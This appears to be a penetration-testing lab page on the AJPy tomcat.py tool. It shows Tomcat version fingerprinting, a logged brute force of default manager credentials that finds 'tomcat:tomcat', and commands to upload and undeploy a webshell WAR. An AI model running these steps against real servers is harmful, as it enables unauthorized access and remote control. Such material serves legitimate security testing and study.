tomcat.py

Intro

AJPy aims to craft AJP requests in order to communicate with AJP connectors.

Reference documentation: https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html

Code

https://raw.githubusercontent.com/hypn0s/AJPy/master/tomcat.py

Tools

At the moment, only one tool is provided for Tomcat with the following modules:

  • version fingerprint
$ python tomcat.py version 172.17.0.2
Apache Tomcat/8.0.35
  • authentication bruteforce
root@kali:~/pwk# python tomcat.py -v  bf -U UFILE -P PFILE /manager/html 10.11.1.x
[2019-06-12 03:35:54.695] INFO     Attacking a tomcat at ajp13://10.11.1.x:8009/manager/html
[2019-06-12 03:35:54.698] DEBUG    testing admin:admin
[2019-06-12 03:35:54.780] DEBUG    testing admin:manager
[2019-06-12 03:35:54.863] DEBUG    testing admin:role1
[2019-06-12 03:35:54.941] DEBUG    testing admin:root
[2019-06-12 03:35:55.026] DEBUG    testing admin:tomcat
[2019-06-12 03:35:55.106] DEBUG    testing admin:s3cret
[2019-06-12 03:35:55.186] DEBUG    testing admin:vagrant
[2019-06-12 03:35:55.266] DEBUG    testing manager:admin
[2019-06-12 03:35:55.347] DEBUG    testing manager:manager
[2019-06-12 03:35:55.428] DEBUG    testing manager:role1
[2019-06-12 03:35:55.509] DEBUG    testing manager:root
[2019-06-12 03:35:55.591] DEBUG    testing manager:tomcat
[2019-06-12 03:35:55.673] DEBUG    testing manager:s3cret
[2019-06-12 03:35:55.756] DEBUG    testing manager:vagrant
[2019-06-12 03:35:55.835] DEBUG    testing role1:admin
[2019-06-12 03:35:55.923] DEBUG    testing role1:manager
[2019-06-12 03:35:56.001] DEBUG    testing role1:role1
[2019-06-12 03:35:56.084] DEBUG    testing role1:root
[2019-06-12 03:35:56.165] DEBUG    testing role1:tomcat
[2019-06-12 03:35:56.243] INFO     Found valid credz: role1:tomcat but the user is not authorized to access this resource
[2019-06-12 03:35:56.243] DEBUG    testing role1:s3cret
[2019-06-12 03:35:56.325] DEBUG    testing role1:vagrant
[2019-06-12 03:35:56.415] DEBUG    testing root:admin
[2019-06-12 03:35:56.493] DEBUG    testing root:manager
[2019-06-12 03:35:56.575] DEBUG    testing root:role1
[2019-06-12 03:35:56.657] DEBUG    testing root:root
[2019-06-12 03:35:56.742] DEBUG    testing root:tomcat
[2019-06-12 03:35:56.826] DEBUG    testing root:s3cret
[2019-06-12 03:35:56.909] DEBUG    testing root:vagrant
[2019-06-12 03:35:56.991] DEBUG    testing tomcat:admin
[2019-06-12 03:35:57.073] DEBUG    testing tomcat:manager
[2019-06-12 03:35:57.155] DEBUG    testing tomcat:role1
[2019-06-12 03:35:57.237] DEBUG    testing tomcat:root
[2019-06-12 03:35:57.320] DEBUG    testing tomcat:tomcat
[2019-06-12 03:35:57.407] INFO     Found valid credz: tomcat:tomcat
[2019-06-12 03:35:57.408] DEBUG    testing tomcat:s3cret
[2019-06-12 03:35:57.495] DEBUG    testing tomcat:vagrant
[2019-06-12 03:35:57.574] DEBUG    testing s3cret:admin
[2019-06-12 03:35:57.654] DEBUG    testing s3cret:manager
[2019-06-12 03:35:57.733] DEBUG    testing s3cret:role1
[2019-06-12 03:35:57.819] DEBUG    testing s3cret:root
[2019-06-12 03:35:57.899] DEBUG    testing s3cret:tomcat
[2019-06-12 03:35:57.979] DEBUG    testing s3cret:s3cret
[2019-06-12 03:35:58.065] DEBUG    testing s3cret:vagrant
[2019-06-12 03:35:58.145] DEBUG    testing vagrant:admin
[2019-06-12 03:35:58.230] DEBUG    testing vagrant:manager
[2019-06-12 03:35:58.309] DEBUG    testing vagrant:role1
[2019-06-12 03:35:58.397] DEBUG    testing vagrant:root
[2019-06-12 03:35:58.476] DEBUG    testing vagrant:tomcat
[2019-06-12 03:35:58.556] DEBUG    testing vagrant:s3cret
[2019-06-12 03:35:58.646] DEBUG    testing vagrant:vagrant
[2019-06-12 03:35:58.725] DEBUG    Closing socket...
  • WAR upload
$ python tomcat.py upload -u tomcat -p tomcat webshell.war 172.17.0.2
  • WAR undeploy
$ python tomcat.py undeploy -u tomcat -p tomcat /webshell 172.17.0.2
  • Application listing
$ python tomcat.py list -u tomcat -p tomcat 172.17.0.2

Thanks

  • @MrTchuss for the Tomcat WAR upload fix
  • @kalidor for the Tomcat WAR undeploy and application listing
  • https://github.com/hypn0s/AJPy for all !!

Author: Jacco Straathof